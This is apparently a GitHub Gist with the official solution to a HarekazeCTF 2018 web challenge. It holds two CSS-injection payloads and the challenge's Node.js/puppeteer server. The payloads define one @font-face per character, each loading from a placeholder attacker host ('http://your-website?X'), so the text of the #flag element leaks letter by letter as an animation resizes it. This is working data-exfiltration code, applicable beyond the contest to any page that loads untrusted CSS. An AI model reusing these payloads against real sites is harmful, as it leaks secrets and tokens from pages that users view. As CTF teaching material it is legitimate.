Last active
February 11, 2018 06:56
-
-
Save KageShiron/bb920ae6678d659de5b1949921942fca to your computer and use it in GitHub Desktop.
HarekazeCTF 2018 Web250-A custom CSS for the flag (Official answer)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@font-face { | |
font-family: 'Capital-A'; | |
src: url('http://your-website?A'); | |
unicode-range: U+0041; | |
} | |
@font-face{ | |
font-family:'Capital-B'; | |
src:url('http://your-website?CB'); | |
unicode-range:U+0042; | |
} | |
@font-face{ | |
font-family:'Capital-C'; | |
src:url('http://your-website?C'); | |
unicode-range:U+0043; | |
} | |
@font-face{ | |
font-family:'Capital-D'; | |
src:url('http://your-website?D'); | |
unicode-range:U+0044; | |
} | |
@font-face{ | |
font-family:'Capital-E'; | |
src:url('http://your-website?E'); | |
unicode-range:U+0045; | |
} | |
@font-face{ | |
font-family:'Capital-F'; | |
src:url('http://your-website?F'); | |
unicode-range:U+0046; | |
} | |
@font-face{ | |
font-family:'Capital-G'; | |
src:url('http://your-website?G'); | |
unicode-range:U+0047; | |
} | |
@font-face{ | |
font-family:'Capital-H'; | |
src:url('http://your-website?H'); | |
unicode-range:U+0048; | |
} | |
@font-face{ | |
font-family:'Capital-I'; | |
src:url('http://your-website?I'); | |
unicode-range:U+0049; | |
} | |
@font-face{ | |
font-family:'Capital-J'; | |
src:url('http://your-website?J'); | |
unicode-range:U+004A; | |
} | |
@font-face{ | |
font-family:'Capital-K'; | |
src:url('http://your-website?K'); | |
unicode-range:U+004B; | |
} | |
@font-face{ | |
font-family:'Capital-L'; | |
src:url('http://your-website?L'); | |
unicode-range:U+004C; | |
} | |
@font-face{ | |
font-family:'Capital-M'; | |
src:url('http://your-website?M'); | |
unicode-range:U+004D; | |
} | |
@font-face{ | |
font-family:'Capital-N'; | |
src:url('http://your-website?N'); | |
unicode-range:U+004E; | |
} | |
@font-face{ | |
font-family:'Capital-O'; | |
src:url('http://your-website?O'); | |
unicode-range:U+004F; | |
} | |
@font-face{ | |
font-family:'Capital-P'; | |
src:url('http://your-website?P'); | |
unicode-range:U+0050; | |
} | |
@font-face{ | |
font-family:'Capital-Q'; | |
src:url('http://your-website?Q'); | |
unicode-range:U+0051; | |
} | |
@font-face{ | |
font-family:'Capital-R'; | |
src:url('http://your-website?R'); | |
unicode-range:U+0052; | |
} | |
@font-face{ | |
font-family:'Capital-S'; | |
src:url('http://your-website?S'); | |
unicode-range:U+0053; | |
} | |
@font-face{ | |
font-family:'Capital-T'; | |
src:url('http://your-website?T'); | |
unicode-range:U+0054; | |
} | |
@font-face{ | |
font-family:'Capital-U'; | |
src:url('http://your-website?U'); | |
unicode-range:U+0055; | |
} | |
@font-face{ | |
font-family:'Capital-V'; | |
src:url('http://your-website?V'); | |
unicode-range:U+0056; | |
} | |
@font-face{ | |
font-family:'Capital-W'; | |
src:url('http://your-website?W'); | |
unicode-range:U+0057; | |
} | |
@font-face{ | |
font-family:'Capital-X'; | |
src:url('http://your-website?X'); | |
unicode-range:U+0058; | |
} | |
@font-face{ | |
font-family:'Capital-Y'; | |
src:url('http://your-website?Y'); | |
unicode-range:U+0059; | |
} | |
@font-face{ | |
font-family:'Capital-Z'; | |
src:url('http://your-website?Z'); | |
unicode-range:U+005A; | |
} | |
@font-face{ | |
font-family:'Small-a'; | |
src:url('http://your-website?a'); | |
unicode-range:U+0061; | |
} | |
@font-face{ | |
font-family:'Small-b'; | |
src:url('http://your-website?b'); | |
unicode-range:U+0062; | |
} | |
@font-face{ | |
font-family:'Small-c'; | |
src:url('http://your-website?c'); | |
unicode-range:U+0063; | |
} | |
@font-face{ | |
font-family:'Small-d'; | |
src:url('http://your-website?d'); | |
unicode-range:U+0064; | |
} | |
@font-face{ | |
font-family:'Small-e'; | |
src:url('http://your-website?e'); | |
unicode-range:U+0065; | |
} | |
@font-face{ | |
font-family:'Small-f'; | |
src:url('http://your-website?f'); | |
unicode-range:U+0066; | |
} | |
@font-face{ | |
font-family:'Small-g'; | |
src:url('http://your-website?g'); | |
unicode-range:U+0067; | |
} | |
@font-face{ | |
font-family:'Small-h'; | |
src:url('http://your-website?h'); | |
unicode-range:U+0068; | |
} | |
@font-face{ | |
font-family:'Small-i'; | |
src:url('http://your-website?i'); | |
unicode-range:U+0069; | |
} | |
@font-face{ | |
font-family:'Small-j'; | |
src:url('http://your-website?j'); | |
unicode-range:U+006A; | |
} | |
@font-face{ | |
font-family:'Small-k'; | |
src:url('http://your-website?k'); | |
unicode-range:U+006B; | |
} | |
@font-face{ | |
font-family:'Small-l'; | |
src:url('http://your-website?l'); | |
unicode-range:U+006C; | |
} | |
@font-face{ | |
font-family:'Small-m'; | |
src:url('http://your-website?m'); | |
unicode-range:U+006D; | |
} | |
@font-face{ | |
font-family:'Small-n'; | |
src:url('http://your-website?n'); | |
unicode-range:U+006E; | |
} | |
@font-face{ | |
font-family:'Small-o'; | |
src:url('http://your-website?o'); | |
unicode-range:U+006F; | |
} | |
@font-face{ | |
font-family:'Small-p'; | |
src:url('http://your-website?p'); | |
unicode-range:U+0070; | |
} | |
@font-face{ | |
font-family:'Small-q'; | |
src:url('http://your-website?q'); | |
unicode-range:U+0071; | |
} | |
@font-face{ | |
font-family:'Small-r'; | |
src:url('http://your-website?r'); | |
unicode-range:U+0072; | |
} | |
@font-face{ | |
font-family:'Small-s'; | |
src:url('http://your-website?s'); | |
unicode-range:U+0073; | |
} | |
@font-face{ | |
font-family:'Small-t'; | |
src:url('http://your-website?t'); | |
unicode-range:U+0074; | |
} | |
@font-face{ | |
font-family:'Small-u'; | |
src:url('http://your-website?u'); | |
unicode-range:U+0075; | |
} | |
@font-face{ | |
font-family:'Small-v'; | |
src:url('http://your-website?v'); | |
unicode-range:U+0076; | |
} | |
@font-face{ | |
font-family:'Small-w'; | |
src:url('http://your-website?w'); | |
unicode-range:U+0077; | |
} | |
@font-face{ | |
font-family:'Small-x'; | |
src:url('http://your-website?x'); | |
unicode-range:U+0078; | |
} | |
@font-face{ | |
font-family:'Small-y'; | |
src:url('http://your-website?y'); | |
unicode-range:U+0079; | |
} | |
@font-face{ | |
font-family:'Small-z'; | |
src:url('http://your-website?z'); | |
unicode-range:U+007A; | |
} | |
@font-face{ | |
font-family:'under'; | |
src:url('http://your-website?-'); | |
unicode-range:U+005F; | |
} | |
@font-face{ | |
font-family:'hyphen'; | |
src:url('http://your-website?_'); | |
unicode-range:U+002D; | |
} | |
#flag { | |
animation:fade 10s linear; | |
word-break: break-all; | |
} | |
#flag::first-line{ | |
font-family: 'under','hypen','Capital-A', 'Capital-B', 'Capital-C', 'Capital-D', 'Capital-E', 'Capital-F', 'Capital-G', 'Capital-H', 'Capital-I', 'Capital-J', 'Capital-K', 'Capital-L', 'Capital-M', 'Capital-N', 'Capital-O', 'Capital-P', 'Capital-Q', 'Capital-R', 'Capital-S', 'Capital-T', 'Capital-U', 'Capital-V', 'Capital-W', 'Capital-X', 'Capital-Y', 'Capital-Z', 'Small-a', 'Small-b', 'Small-c', 'Small-d', 'Small-e', 'Small-f', 'Small-g', 'Small-h', 'Small-i', 'Small-j', 'Small-k', 'Small-l', 'Small-m', 'Small-n', 'Small-o', 'Small-p', 'Small-q', 'Small-r', 'Small-s', 'Small-t', 'Small-u', 'Small-v', 'Small-w', 'Small-x', 'Small-y', 'Small-z'; | |
} | |
@keyframes fade { | |
0% { | |
width:10px; | |
} | |
100% { | |
width: 500px; | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* 前から後ろ */ | |
@font-face { | |
font-family: 'Capital-A'; | |
src: url('http://your-website?A'); | |
unicode-range: U+0041; | |
} | |
@font-face{ | |
font-family:'Capital-B'; | |
src:url('http://your-website?B'); | |
unicode-range:U+0042; | |
} | |
@font-face{ | |
font-family:'Capital-C'; | |
src:url('http://your-website?C'); | |
unicode-range:U+0043; | |
} | |
@font-face{ | |
font-family:'Capital-D'; | |
src:url('http://your-website?D'); | |
unicode-range:U+0044; | |
} | |
@font-face{ | |
font-family:'Capital-E'; | |
src:url('http://your-website?E'); | |
unicode-range:U+0045; | |
} | |
@font-face{ | |
font-family:'Capital-F'; | |
src:url('http://your-website?F'); | |
unicode-range:U+0046; | |
} | |
@font-face{ | |
font-family:'Capital-G'; | |
src:url('http://your-website?G'); | |
unicode-range:U+0047; | |
} | |
@font-face{ | |
font-family:'Capital-H'; | |
src:url('http://your-website?H'); | |
unicode-range:U+0048; | |
} | |
@font-face{ | |
font-family:'Capital-I'; | |
src:url('http://your-website?I'); | |
unicode-range:U+0049; | |
} | |
@font-face{ | |
font-family:'Capital-J'; | |
src:url('http://your-website?J'); | |
unicode-range:U+004A; | |
} | |
@font-face{ | |
font-family:'Capital-K'; | |
src:url('http://your-website?K'); | |
unicode-range:U+004B; | |
} | |
@font-face{ | |
font-family:'Capital-L'; | |
src:url('http://your-website?L'); | |
unicode-range:U+004C; | |
} | |
@font-face{ | |
font-family:'Capital-M'; | |
src:url('http://your-website?M'); | |
unicode-range:U+004D; | |
} | |
@font-face{ | |
font-family:'Capital-N'; | |
src:url('http://your-website?N'); | |
unicode-range:U+004E; | |
} | |
@font-face{ | |
font-family:'Capital-O'; | |
src:url('http://your-website?O'); | |
unicode-range:U+004F; | |
} | |
@font-face{ | |
font-family:'Capital-P'; | |
src:url('http://your-website?P'); | |
unicode-range:U+0050; | |
} | |
@font-face{ | |
font-family:'Capital-Q'; | |
src:url('http://your-website?Q'); | |
unicode-range:U+0051; | |
} | |
@font-face{ | |
font-family:'Capital-R'; | |
src:url('http://your-website?R'); | |
unicode-range:U+0052; | |
} | |
@font-face{ | |
font-family:'Capital-S'; | |
src:url('http://your-website?S'); | |
unicode-range:U+0053; | |
} | |
@font-face{ | |
font-family:'Capital-T'; | |
src:url('http://your-website?T'); | |
unicode-range:U+0054; | |
} | |
@font-face{ | |
font-family:'Capital-U'; | |
src:url('http://your-website?U'); | |
unicode-range:U+0055; | |
} | |
@font-face{ | |
font-family:'Capital-V'; | |
src:url('http://your-website?V'); | |
unicode-range:U+0056; | |
} | |
@font-face{ | |
font-family:'Capital-W'; | |
src:url('http://your-website?W'); | |
unicode-range:U+0057; | |
} | |
@font-face{ | |
font-family:'Capital-X'; | |
src:url('http://your-website?X'); | |
unicode-range:U+0058; | |
} | |
@font-face{ | |
font-family:'Capital-Y'; | |
src:url('http://your-website?Y'); | |
unicode-range:U+0059; | |
} | |
@font-face{ | |
font-family:'Capital-Z'; | |
src:url('http://your-website?Z'); | |
unicode-range:U+005A; | |
} | |
@font-face{ | |
font-family:'Small-a'; | |
src:url('http://your-website?a'); | |
unicode-range:U+0061; | |
} | |
@font-face{ | |
font-family:'Small-b'; | |
src:url('http://your-website?b'); | |
unicode-range:U+0062; | |
} | |
@font-face{ | |
font-family:'Small-c'; | |
src:url('http://your-website?c'); | |
unicode-range:U+0063; | |
} | |
@font-face{ | |
font-family:'Small-d'; | |
src:url('http://your-website?d'); | |
unicode-range:U+0064; | |
} | |
@font-face{ | |
font-family:'Small-e'; | |
src:url('http://your-website?e'); | |
unicode-range:U+0065; | |
} | |
@font-face{ | |
font-family:'Small-f'; | |
src:url('http://your-website?f'); | |
unicode-range:U+0066; | |
} | |
@font-face{ | |
font-family:'Small-g'; | |
src:url('http://your-website?g'); | |
unicode-range:U+0067; | |
} | |
@font-face{ | |
font-family:'Small-h'; | |
src:url('http://your-website?h'); | |
unicode-range:U+0068; | |
} | |
@font-face{ | |
font-family:'Small-i'; | |
src:url('http://your-website?i'); | |
unicode-range:U+0069; | |
} | |
@font-face{ | |
font-family:'Small-j'; | |
src:url('http://your-website?j'); | |
unicode-range:U+006A; | |
} | |
@font-face{ | |
font-family:'Small-k'; | |
src:url('http://your-website?k'); | |
unicode-range:U+006B; | |
} | |
@font-face{ | |
font-family:'Small-l'; | |
src:url('http://your-website?l'); | |
unicode-range:U+006C; | |
} | |
@font-face{ | |
font-family:'Small-m'; | |
src:url('http://your-website?m'); | |
unicode-range:U+006D; | |
} | |
@font-face{ | |
font-family:'Small-n'; | |
src:url('http://your-website?n'); | |
unicode-range:U+006E; | |
} | |
@font-face{ | |
font-family:'Small-o'; | |
src:url('http://your-website?o'); | |
unicode-range:U+006F; | |
} | |
@font-face{ | |
font-family:'Small-p'; | |
src:url('http://your-website?p'); | |
unicode-range:U+0070; | |
} | |
@font-face{ | |
font-family:'Small-q'; | |
src:url('http://your-website?q'); | |
unicode-range:U+0071; | |
} | |
@font-face{ | |
font-family:'Small-r'; | |
src:url('http://your-website?r'); | |
unicode-range:U+0072; | |
} | |
@font-face{ | |
font-family:'Small-s'; | |
src:url('http://your-website?s'); | |
unicode-range:U+0073; | |
} | |
@font-face{ | |
font-family:'Small-t'; | |
src:url('http://your-website?t'); | |
unicode-range:U+0074; | |
} | |
@font-face{ | |
font-family:'Small-u'; | |
src:url('http://your-website?u'); | |
unicode-range:U+0075; | |
} | |
@font-face{ | |
font-family:'Small-v'; | |
src:url('http://your-website?v'); | |
unicode-range:U+0076; | |
} | |
@font-face{ | |
font-family:'Small-w'; | |
src:url('http://your-website?w'); | |
unicode-range:U+0077; | |
} | |
@font-face{ | |
font-family:'Small-x'; | |
src:url('http://your-website?x'); | |
unicode-range:U+0078; | |
} | |
@font-face{ | |
font-family:'Small-y'; | |
src:url('http://your-website?y'); | |
unicode-range:U+0079; | |
} | |
@font-face{ | |
font-family:'Small-z'; | |
src:url('http://your-website?z'); | |
unicode-range:U+007A; | |
} | |
@font-face{ | |
font-family:'under'; | |
src:url('http://your-website?-'); | |
unicode-range:U+005F; | |
} | |
@font-face{ | |
font-family:'hyphen'; | |
src:url('http://your-website?_'); | |
unicode-range:U+002D; | |
} | |
#flag { | |
animation:fade 10s linear; | |
word-break: break-all; | |
font-family: 'under','hypen','Capital-A', 'Capital-B', 'Capital-C', 'Capital-D', 'Capital-E', 'Capital-F', 'Capital-G', 'Capital-H', 'Capital-I', 'Capital-J', 'Capital-K', 'Capital-L', 'Capital-M', 'Capital-N', 'Capital-O', 'Capital-P', 'Capital-Q', 'Capital-R', 'Capital-S', 'Capital-T', 'Capital-U', 'Capital-V', 'Capital-W', 'Capital-X', 'Capital-Y', 'Capital-Z', 'Small-a', 'Small-b', 'Small-c', 'Small-d', 'Small-e', 'Small-f', 'Small-g', 'Small-h', 'Small-i', 'Small-j', 'Small-k', 'Small-l', 'Small-m', 'Small-n', 'Small-o', 'Small-p', 'Small-q', 'Small-r', 'Small-s', 'Small-t', 'Small-u', 'Small-v', 'Small-w', 'Small-x', 'Small-y', 'Small-z'; | |
} | |
#flag::first-line{ | |
font-family:none; | |
} | |
@keyframes fade { | |
0% { | |
width:500px; | |
} | |
100% { | |
width: 10px; | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'use strict'; | |
const express = require("express"); | |
const bodyParser = require('body-parser'); | |
const puppeteer = require('puppeteer'); | |
const https = require('https'); | |
const fs = require("fs"); | |
const app = express(); | |
const request = require("request"); | |
app.use(bodyParser.urlencoded({ extended: true })) | |
app.use(bodyParser.json()) | |
async function crawl(req, res) { | |
if(!req.body['g-recaptcha-response']) { | |
res.send("ReCAPTCHA error."); | |
return; | |
} | |
var verificationUrl = `https://www.google.com/recaptcha/api/siteverify?secret=${process.env.RECAPTCHA_SECRET}&response=${req.body['g-recaptcha-response']}&remoteip=${req.connection.remoteAddress}` | |
request(verificationUrl,async function(error,response,body) { | |
const recaptcha = JSON.parse(body); | |
if( recaptcha.success === true ) { | |
res.send("Crawling"); | |
const browser = await puppeteer.launch({executablePath: '/usr/bin/chromium'}); | |
const page = await browser.newPage(); | |
await page.goto( "http://127.0.0.1:3002/flag.html?css=" + req.body.css, { waitUntil: "load" }); | |
await page.waitFor(20000); | |
await browser.close(); | |
}else{ | |
res.send("ReCAPTCHA error."); | |
} | |
}); | |
}; | |
app.get('/server.js',function (req, res) { res.sendFile("/app/server.js") }); | |
app.post('/crawl.html', crawl); | |
app.use('/', express.static('public')); | |
var server = app.listen(3001, function () { | |
var host = server.address().address; | |
var port = server.address().port; | |
console.log('CSS-Injection http://%s:%s', host, port); | |
}); | |
const app2 = express(); | |
app2.get('/flag.html', function (req, res) { | |
console.log(req.connection.remoteAddress); | |
req.query.css = req.query.css || ""; | |
if (req.query.css.startsWith("http://") || req.query.css.startsWith("https://")) { | |
res.send(`<html> | |
<link rel="stylesheet" href="${encodeURI(req.query.css)}" /> | |
<body> | |
<div id="flag"> | |
HarekazeCTF{${fs.readFileSync("flag.txt")}} | |
</div> | |
</body> | |
</html>`); | |
} else { | |
res.send("Bad URI"); | |
} | |
}); | |
var server2 = app2.listen(3002,"localhost"); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment